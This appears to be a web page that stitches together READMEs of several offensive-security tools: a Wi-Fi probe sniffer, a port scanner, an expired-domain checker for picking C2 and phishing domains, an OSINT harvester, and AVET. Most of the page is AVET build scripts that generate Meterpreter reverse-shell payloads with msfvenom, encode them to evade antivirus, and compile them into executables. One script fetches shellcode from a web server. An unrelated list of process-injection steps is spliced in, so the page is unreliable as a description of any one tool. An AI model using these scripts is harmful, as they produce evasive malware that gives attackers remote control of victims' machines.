____  ____   ___  ____    ___ _________  ____ _____ _____  ___ ____
|    \|    \ /   \|    \  /  _/ ___|    \|    |     |     |/  _|    \
|  o  |  D  |     |  o  )/  [(   \_|  _  ||  ||   __|   __/  [_|  D  )
|   _/|    /|  O  |     |    _\__  |  |  ||  ||  |_ |  |_|    _|    /
|  |  |    \|     |  O  |   [_/  \ |  |  ||  ||   _]|   _|   [_|    \
|  |  |  .  |     |     |     \    |  |  ||  ||  |  |  | |     |  .  \
|__|  |__|\_|\___/|_____|_____|\___|__|__|____|__|  |__| |_____|__|\__|
                                       v2.1 by David SchĂźtz (@xdavidhu)

A tool for sniffing unencrypted wireless probe requests from devices:

new in 2.1:

• Displaying the number of hosts
• Logging to SQLite database file
• Settable nickname for mac addresses
• Options to filter output by mac address
• Capturing ‘boradcast’ probe requests (without ssid)

requirements:

• Kali Linux / Raspbian with root privileges
• Python3 & PIP3 (probeSniffer will install the dependenices)
• A wireless card (capable for monitor mode) and one other internet connected interface (for vendor resolve)

options:

• -d / do not show duplicate requests
• -b / do not show broadcast requests
• -f / only show requests from the specified mac address
• –addnicks / add nicknames to mac addresses
• –flushnicks / flush nickname database
• –nosql / disable SQL logging completely
• –debug / turn debug mode on
• -h / display help menu

installing:

Kali Linux / Raspbian:

$ sudo apt-get update && sudo apt-get install python3 python3-pip -y

$ git clone https://github.com/xdavidhu/probeSniffer

$ cd probeSniffer/

$ python3 -m pip install -r requirements.txt

WARNING: probeSniffer is only compatible with Python 3.3 & 3.4 & 3.5 & 3.6

usage:
Make sure to put your interface into monitor mode before!

$ sudo python3 probeSniffer.py [monitor-mode-interface] [options]

DLL injection:

• Open target process.
• Allocate space.
• Write code into the remote process.
• Execute the remote code.

Process replacement:

• Create target process and suspend it.
• Unmap from memory.
• Allocate space.
• Write headers and sections into the remote process.
• Resume remote thread.

Hook injection:

• Find/Create process.
• Set hook

APC injection:

• Open process.
• Allocate space.
• Write code into remote threads.
• “Execute” threads using QueueUserAPC.

Download
Windows x64 binary – x64 bit DEMO

Dependencies:
vc_redist.x64 – Microsoft Visual C++ Redistributable

modules:

• http – Scan for open HTTP ports, and get the the titles.
• mysql – Scan for open MySQL servers, and try to log in with the default credentials.
• mongodb – Scan for open MongoDB instances, and check if they are password protected.
• ssh – Scan for open SSH ports.
• printer – Scan for open printer ports and websites.
• gameserver – Scan for open game server ports.
• manual – Scan custom ports.

commands:

• modules – List all modules.
• use – Use a module.
• options – Show a module’s options.
• set – Set an option.
• run – Run the selected module.
• back – Go back to menu.
• exit – Shut down portSpider.

installing:

Debian based systems:

$ sudo apt-get update && sudo apt-get install python3 python3-pip -y

$ git clone https://github.com/xdavidhu/portSpider

$ cd portSpider/

$ python3 -m pip install -r requirements.txt

macOS / OSX:

$ brew install python3

$ git clone https://github.com/xdavidhu/portSpider

$ cd portSpider/

$ python3 -m pip install -r requirements.txt

NOTE: You need to have Homebrew installed before running the macOS/OSX installation.
WARNING: portSpider is only compatible with Python 3.3 & 3.4 & 3.5 & 3.6

developers:

• David Schütz (@xdavidhu” class=”wp-links-icon”>@xdavidhu)
• László Simonffy (@Letsgo00HUN” class=”wp-links-icon”>@Letsgo00HUN) – Multithreading

Changes

- June 6 2017
    + Added python 3 support
    + Code cleanup and bug fixes
    + Added Status column (Available, Make Offer, Price,Backorder,etc)

Features

• Retrieves specified number of recently expired and deleted domains (.com, .net, .org primarily)
• Retrieves available domains based on keyword search
• Reads line delimited input file of potential domains names to check against reputation services
• Performs reputation checks against the Blue Coat Site Review and IBM x-Force services
• Sorts results by domain age (if known)
• Text-based table and HTML report output with links to reputation sources and Archive.org entry

Usage
Install Requirements

pip install -r requirements.txt
or
pip install requests texttable beautifulsoup4 lxml

List DomainHunter options

python ./domainhunter.py
usage: domainhunter.py [-h] [-q QUERY] [-c] [-r MAXRESULTS] [-w MAXWIDTH]

Checks expired domains, bluecoat categorization, and Archive.org history to
determine good candidates for C2 and phishing domains

optional arguments:
  -h, --help            show this help message and exit
  -q QUERY, --query QUERY
                        Optional keyword used to refine search results
  -c, --check         Perform slow reputation checks
  -r MAXRESULTS, --maxresults MAXRESULTS
                        Number of results to return when querying latest
                        expired/deleted domains (min. 100)

Use defaults to check for most recent 100 domains and check reputation

python ./domainhunter.py

Search for 1000 most recently expired/deleted domains, but don’t check reputation against Bluecoat or IBM xForce

python ./domainhunter.py -r 1000 -n

Retreive reputation information from domains in an input file

python ./domainhunter.py -f <filename>

Search for available domains with search term of “dog” and max results of 100

./domainhunter.py -q dog -r 100 -c
 ____   ___  __  __    _    ___ _   _   _   _ _   _ _   _ _____ _____ ____
|  _ \ / _ \|  \/  |  / \  |_ _| \ | | | | | | | | | \ | |_   _| ____|  _ \
| | | | | | | |\/| | / _ \  | ||  \| | | |_| | | | |  \| | | | |  _| | |_) |
| |_| | |_| | |  | |/ ___ \ | || |\  | |  _  | |_| | |\  | | | | |___|  _ <
|____/ \___/|_|  |_/_/   \_\___|_| \_| |_| |_|\___/|_| \_| |_| |_____|_| \_\

Expired Domains Reputation Checker
▼Advertisements

DISCLAIMER:
This is for educational purposes only!
It is designed to promote education and the improvement of computer/cyber security.
The authors or employers are not liable for any illegal act or misuse performed by any user of this tool.
If you plan to use this content for illegal purpose, don't.  Have a nice day :)

********************************************
Start Time:             20170301_113226
TextTable Column Width: 400
Checking Reputation:    True
Number Domains Checked: 100
********************************************
Estimated Max Run Time: 33 minutes

[*] Downloading malware domain list from http://mirror1.malwaredomains.com/files/justdomains
[*] Fetching expired or deleted domains containing "dog"...
[*]  https://www.expireddomains.net/domain-name-search/?q=dog
[*] BlueCoat Check: Dog.org.au
[+] Dog.org.au is categorized as: Uncategorized
[*] IBM xForce Check: Dog.org.au
[+] Dog.org.au is categorized as: Not found.
[*] BlueCoat Check: Dog.asia
[+] Dog.asia is categorized as: Uncategorized
[*] IBM xForce Check: Dog.asia
[+] Dog.asia is categorized as: Not found.
[*] BlueCoat Check: HomeDog.net
[+] HomeDog.net is categorized as: Uncategorized
[*] IBM xForce Check: HomeDog.net
[+] HomeDog.net is categorized as: Not found.
[*] BlueCoat Check: PolyDogs.com
[+] PolyDogs.com is categorized as: Uncategorized
[*] IBM xForce Check: PolyDogs.com
[+] PolyDogs.com is categorized as: Not found.
[*] BlueCoat Check: SaltyDog.it
[+] SaltyDog.it is categorized as: Uncategorized
[*] IBM xForce Check: SaltyDog.it
[+] SaltyDog.it is categorized as: Not found.
[*]  https://www.expireddomains.net/domain-name-search/?start=25&q=dog
[*] BlueCoat Check: FetchDoggieStore.com
[+] FetchDoggieStore.com is categorized as: Society/Daily Living
[*] IBM xForce Check: FetchDoggieStore.com
[+] FetchDoggieStore.com is categorized as: {u'General Business': True}

Report Header Reference

• Domain: Target Domain
• Birth: First seen on Archive.org
• Entries: Number of entries in Archive.org
• TLDs Available: Top level top available
• Bluecoat Categorization: Bluecoat category
• IBM-xForce Categorization: IBM-xForce category
• WatchGuard: Watchguard reputation
• Namecheap: Link to namecheap.com
• Archive.org: Link to archive.org

What Belati can do?

• Whois(Indonesian TLD Support)
• Banner Grabbing
• Subdomain Enumeration
• Service Scanning for all Subdomain Machine
• Web Appalyzer Support
• DNS mapping / Zone Scanning
• Mail Harvester from Website & Search Engine
• Mail Harvester from MIT PGP Public Key Server
• Scrapping Public Document for Domain from Search Engine
• Fake and Random User Agent ( Prevent from blocking )
• Proxy Support for Harvesting Emails and Documents
• Public Git Finder in domain/subdomain
• Public SVN Finder in domain/subdomain
• Robot.txt Scraper in domain/subdomain
• Gather Public Company Info & Employee
• SQLite3 Database Support for storing Belati Results
• Setup Wizard/Configuration for Belati

TODO

• Automatic OSINT with Username and Email support
• Organization or Company OSINT Support
• Collecting Data from Public service with Username and Email for LinkedIn and other service.
• Setup Wizard for Token and setting up Belati
• Token Support
• Email Harvesting with multiple content(github, linkedin, etc)
• Scrapping Public Document with multiple search engine(yahoo, yandex, bing etc)
• Metadata Extractor
• Web version with Django
• Scanning Report export to PDF
• domain or subdomain reputation checker
• Reporting Support to JSON, PDF
• Belati Updater

Install/Usage

git clone https://github.com/aancw/Belati.git
cd Belati
git submodule update --init --recursive --remote
pip install -r requirements.txt #please use pip with python v2
sudo su
python Belati.py --help

Tested On
Ubuntu 16.04 x86_64 Arch Linux x86_64 CentOS 7

Python Requirements
This tool not compatible with Python 3. So use python v2.7 instead!

Why Need Root Privilege?
Nmap need Root Privilege. You can add sudo or other way to run nmap without root privilege. It’s your choice
Reference -> https://secwiki.org/w/Running_nmap_as_an_unprivileged_user
Don’t worry. Belati still running when you are run with normal user

Dependencies

• urllib2
• dnspython
• requests
• argparse
• texttable
• python-geoip-geolite2
• python-geoip
• dnsknife
• termcolor
• colorama
• validators
• tqdm
• tldextract
• fake-useragent

System Dependencies
For CentOS/Fedora user, please install this:

yum install gcc gmp gmp-devel python-devel

Library

• python-whois
• Sublist3r
• Subbrute
• nmap
• git
• sqlite3

Notice
This tool is for educational purposes only. Any damage you make will not affect the author. Do It With Your Own Risk!

Author
Aan Wahyu a.k.a Petruknisme(https://petruknisme.com)

• when running an exe file made with msfpayload & co, the exe file will often be recognized by the antivirus software
• avet is a antivirus evasion tool targeting windows machines with executable files
• assembly shellcodes can be used
• make_avet can be used for configuring the sourcecode
• with make_avet you can load ASCII encoded shellcodes from a textfile or from a webserver, further it is using an av evasion technique to avoid sandboxing and emulation
• for ASCII encoding the shellcode the tool format.sh and sh_format are included
• this readme applies for Kali 2 (64bit) and tdm-gcc

How to use make_avet and build scripts
Compile if needed:

$ gcc -o make_avet make_avet.c

The purpose of make_avet is to preconfigure a definition file (defs.h) so that the source code can be compiled in the next step. This way the payload will be encoded as ASCII payload or with encoders from metasploit. You hardly can beat shikata-ga-nai.
Let’s have a look at the options from make_avet, examples will be given below: -l load and exec shellcode from given file, call is with mytrojan.exe myshellcode.txt -f compile shellcode into .exe, needs filename of shellcode file -u load and exec shellcode from url using internet explorer (url is compiled into executable) -E use avets ASCII encryption, often do not has to be used Note: with -l -E is mandatory -F use fopen sandbox evasion -X compile for 64 bit -p print debug information -h help
Of course it is possible to run all commands step by step from command line. But it is strongly recommended to use build scripts or the avet_fabric.py.
The build scripts themselves are written so as they have to be called from within the avet directory:

root@kalidan:~/tools/avet# ./build/build_win32_meterpreter_rev_https_20xshikata.sh

Here are some explained examples for building the .exe files from the build directory. Please have a look at the other build scripts for further explanation.

Example 1
Compile shellcode into the .exe file and use -F as evasion technique. Note that this example will work for most antivirus engines. Here -E is used for encoding the shellcode as ASCII.

#!/bin/bash
# simple example script for building the .exe file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.132 lport=443 -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, the -f compiles the shellcode to the exe file, the -F is for the AV sandbox evasion, -E will encode the shellcode as ASCII
./make_avet -f scclean.txt -F -E
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
rm scclean.txt && echo "" > defs.h

Example 2
Usage without -E. The ASCII encoder does not have to be used, here is how to compile without -E. In this example the evasion technique is quit simple! The shellcode is encoded with 20 rounds of shikata-ga-nai, often enough that does the trick. This technique is pretty similar to a junk loop. Execute so much code that the AV engine breaks up execution and let the file pass.

#!/bin/bash
# simple example script for building the .exe file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded 20 rounds with shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.128 lport=443 -e x86/shikata_ga_nai -i 20 -f c -a x86 --platform Windows > sc.txt
# call make_avet, the sandbox escape is due to the many rounds of decoding the shellcode
./make_avet -f sc.txt
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
echo "" > defs.h

Example 3, 64bit payloads
Great to notice that still for 64bit payload no further evasion techniques has to be used. But -F should work here too.

#!/bin/bash
# simple example script for building the .exe file
. build/global_win64.sh
# make meterpreter reverse payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.116.132 lport=443 -f c --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, compile
./make_avet -f scclean.txt -X -E
$win64_compiler -o pwn.exe avet.c
# cleanup
rm scclean.txt && echo "" > defs.h

Example 4, load from a file
Here the ASCII encoder is needed. The executable will load the payload from a text file, which is enough for most AV engines to let the payload execute.

#!/bin/bash
# simple example script for building the .exe file that loads the payload from a given text file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.132 lport=443 -e x86/shikata_ga_nai -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > thepayload.txt && rm sc.txt
# call make_avet, the -l compiles the filename into the .exe file
./make_avet -l thepayload.exe -E
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
#echo "" > defs.h
# now you can call your programm with pwn.exe, thepayload.txt has to be in the same dir

Example 5, load with Internet Explorer
This is a bit tricky and might not work on the first shot. The executable will start Internet Explorer and download the ASCII encoded shellcode. Then the shellcode will be read from the cache directory and if found executed. This was tested with Windows 7 only.

#!/bin/bash
# simple example script for building the .exe file
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.2.105 lport=443 -e x86/shikata_ga_nai -i 2 -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, compile
./make_avet -E -u 192.168.2.105/scclean.txt
$win32_compiler -o pwn.exe avet.c
# cleanup
echo " " > defs.h
# now copy scclean.txt to your web root and start 

avet_fabric.py
avet_fabric is an assistant, that loads all build scripts in the build directory (name has to be build*.sh) and then lets the user edit the settings line by line. This is under huge development.
Example:

# ./avet_fabric.py

                       .|        ,       +
             *         | |      ((             *
                       |'|       `    ._____
         +     ___    |  |   *        |.   |' .---"|
       _    .-'   '-. |  |     .--'|  ||   | _|    |
    .-'|  _.|  |    ||   '-__  |   |  |    ||      |
    |' | |.    |    ||       | |   |  |    ||      |
 ___|  '-'     '    ""       '-'   '-.'    '`      |____
jgs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AVET 1.1 Blackhat Asia 2017 edition
by Daniel Sauder

avet_fabric.py is an assistant for building exe files with shellcode payloads for targeted attacks and antivirus evasion.

0: build_win32_meterpreter_rev_https_shikata_loadfile.sh
1: build_win32_meterpreter_rev_https_shikata_fopen.sh
2: build_win32_meterpreter_rev_https_shikata_load_ie_debug.sh
3: build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh
4: build_win32_meterpreter_rev_https_20xshikata.sh
5: build_win32_meterpreter_rev_https_shikata_load_ie.sh
6: build_win64_meterpreter_rev_tcp.sh
Input number of the script you want use and hit enter: 6

Now you can edit the build script line by line.

simple example script for building the .exe file
$ . build/global_win64.sh
make meterpreter reverse payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.116.132 lport=443 -f c --platform Windows > sc.txt
format the shellcode for make_avet
$ ./format.sh sc.txt > scclean.txt && rm sc.txt
call make_avet, compile
$ ./make_avet -f scclean.txt -X -E
$ $win64_compiler -o pwn.exe avet.c
cleanup
$ rm scclean.txt && echo "" > defs.h

The following commands will be executed:
#/bin/bash
. build/global_win64.sh
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.116.132 lport=443 -f c --platform Windows > sc.txt
./format.sh sc.txt > scclean.txt && rm sc.txt
./make_avet -f scclean.txt -X -E
$win64_compiler -o pwn.exe avet.c
rm scclean.txt && echo "" > defs.h

Press enter to continue.

Building the output file...

Please stand by...

The output file should be placed in the current directory.

Bye...